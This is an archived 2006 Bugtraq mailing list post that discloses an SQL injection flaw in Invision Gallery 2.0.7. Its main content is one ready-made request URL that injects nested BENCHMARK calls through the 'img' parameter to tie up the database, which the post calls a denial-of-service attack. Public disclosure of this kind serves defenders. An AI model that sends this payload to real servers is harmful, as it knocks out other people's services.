bugtraq - Invision Gallery 2.0.7 SQL Injection Vulnerability

lists.openwall.net		lists / announce john-users owl-users popa3d-users / xvendor oss-security / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4
Open Source and information security mailing list archives

This website is powered by Openwall GNU/*/Linux security-enhanced OS

[<prev] [next>] [month] [year] [list]

Date: 1 Dec 2006 10:22:51 -0000
From: infection@...l.kz
To: bugtraq@...urityfocus.com
Subject: Invision Gallery  2.0.7 SQL Injection Vulnerability

Invision Gallery 2.0.7 

DOS attak can be performed

index.php?automodule=gallery&cmd=postcomment&op=doaddcomment&Post=test&img=111 OR id IN (SELECT BENCHMARK(10000000,BENCHMARK(10000000,md5(current_date))) FROM ipb_gallery_images )